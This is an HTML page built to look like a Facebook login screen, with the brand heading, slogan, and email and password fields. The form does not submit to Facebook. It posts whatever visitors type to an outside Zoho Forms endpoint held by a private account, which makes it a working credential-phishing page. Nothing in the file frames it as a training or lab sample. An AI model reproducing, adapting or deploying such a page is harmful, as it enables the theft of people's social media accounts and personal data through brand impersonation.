<html>

<head>
    <title>fb</title>
    <style>
        * {
            margin: 0;
            padding: 0;
        }

        body {
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: rgb(222, 220, 224);
        }

        .container {
            margin: 10px;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: center;
        }

        .leftpart {
            width: 40%;
        }

        h2 {
            color: royalblue;
            font-size: 60px;
        }

        h3 {
            color: black;
            font-size: 30px;
        }

        .rightpart {
            width: 50%;
            display: flex;
            align-items: center;
            flex-direction: column;
        }

        .loginpage {
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: #fff;
            width: 450px;
            height: 370px;
            box-shadow: -10px -10px 15px rgba(0, 0, 0, 0.1);
            /* 10px 10px 15pxrgba(0,0,0,0.1); */
            border-radius: 10px;

        }

        form {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            padding: 15px;
        }

        input {
            width: 350px;
            height: 50px;
            margin: 10px;
            padding: 10px;
            outline: none;
            border: 1px solid #ccc;
            font-size: 18px;
            border-radius: 10px;
        }

        button {
            background-color: royalblue;
            color: white;
            margin: 10px;
            padding: 10px;
            border-radius: 10px;
            outline: none;
            width: 350px;
            height: 50px;
            border: 1px solid #ccc;
            font-size: 25px;
        }

        p {
            color: royalblue;
            font-size: 17px;
        }

        hr {
            border: 1px solid #ccc;
            width: 320px;
            margin: 20px;
        }

        .createaccount {
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
            height: 30px;
            width: 200px;
            font-size: 18px;
            font-weight: 20px;
            background-color: springgreen;
            color: #fff;
            border-radius: 10px;
            padding: 8px;
        }

        span {
            padding: 20px;
            margin: 20px;
            font-size: 18px;

        }
    </style>
</head>

<body>

    <div class="container">
        <div class="leftpart">
            <h2>facebook</h2>
            <h3>
                Facebook helps you connect and share
                with the people in your life
            </h3>
        </div>
        <div class="rightpart">
            <div class="loginpage">
                <form
                    action='https://forms.zohopublic.in/komalavasamsetty/form/facebook/formperma/fWwVEk8tErSQuh_yFlmEyNe3oJQGCUwLhPB-F5JFnLk/htmlRecords/submit'
                    name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
                    <input type="hidden" name="zf_referrer_name"
                        value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
                    <input type="hidden" name="zf_redirect_url"
                        value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
                    <input type="hidden" name="zc_gad"
                        value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
                    <!-- <h2>facebook</h2> -->
                    <p></p>
                    <!--Single Line-->
                    <!-- <label>username</label> -->
                    <input type="text" name="SingleLine" value="" fieldType=1 maxlength="255"
                        placeholder="Email address or phone number" />
                    <!--Single Line-->
                    <!-- <label>password</label> -->
                    <input type="text" name="SingleLine1" value="" fieldType=1 maxlength="255" placeholder="password" />
                    <button type="submit">Log in</button>
                </form>
                <p>Forgotten password?</p>
                <hr>
                <div class="createaccount">
                    Create new account
                </div>
            </div>
            <span>create a page for celebrity, brand or business</span>
        </div>



    </div>
</body>

</html>